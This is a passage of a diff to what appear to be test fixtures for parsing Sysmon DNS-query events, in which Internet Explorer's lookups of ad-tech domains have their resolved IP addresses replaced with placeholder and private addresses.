SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17836,57 +17631,57 @@ }, "answers": [ { - "data": "94.23.171.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.137.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.128.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.73.243", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.144.220", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.228.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.27.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.252.5", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.4.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.242.60", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -17901,22 +17696,13 @@ "grey.erne.co" ], "ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313962121Z", + "ingested": "2021-12-09T13:49:44.739944400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", 
@@ -17976,15 +17762,15 @@ }, "answers": [ { - "data": "54.243.145.203", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.221.211.153", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17992,7 +17778,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18000,7 +17786,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18008,7 +17794,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -18016,7 +17802,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -18025,17 +17811,17 @@ } ], "resolved_ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -18051,24 +17837,23 @@ "sync.jivox.com" ], "ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313963382Z", + "ingested": "2021-12-09T13:49:44.739948300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18132,51 +17917,51 @@ "type": "CNAME" }, { - "data": "207.244.121.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.94.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.65", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.199.69", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.76.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.197.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.108.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.99", + "data": "89.160.20.156", "type": "A" }, { 
@@ -18188,79 +17973,79 @@ "type": "A" }, { - "data": "108.59.4.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.62.117.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.67", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "199.58.84.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.98", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.116", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.73.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.110.3", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.69.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.74", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18268,7 +18053,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18276,7 +18061,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18284,7 +18069,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -18292,7 +18077,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -18300,7 +18085,7 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" }, { 
@@ -18308,7 +18093,7 @@ "type": "AAAA" }, { - "data": "192.42.93.30", + "data": "192.168.93.30", "type": "A" }, { @@ -18316,7 +18101,7 @@ "type": "AAAA" }, { - "data": "192.54.112.30", + "data": "192.168.112.30", "type": "A" }, { @@ -18324,7 +18109,7 @@ "type": "AAAA" }, { - "data": "192.43.172.30", + "data": "192.168.172.30", "type": "A" }, { @@ -18332,7 +18117,7 @@ "type": "AAAA" }, { - "data": "192.48.79.30", + "data": "192.168.79.30", "type": "A" }, { 
@@ -18341,57 +18126,57 @@ } ], "resolved_ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, 
@@ -18408,64 +18193,35 @@ "b1sync.zemanta.com" ], "ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313964762Z", + "ingested": "2021-12-09T13:49:44.739952900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + 
"original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", 
@@ -18529,55 +18285,55 @@ "type": "CNAME" }, { - "data": "124.146.215.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.53", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.52", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.48", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.45", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.54", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.47", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.55", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18586,19 +18342,19 @@ } ], "resolved_ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, 
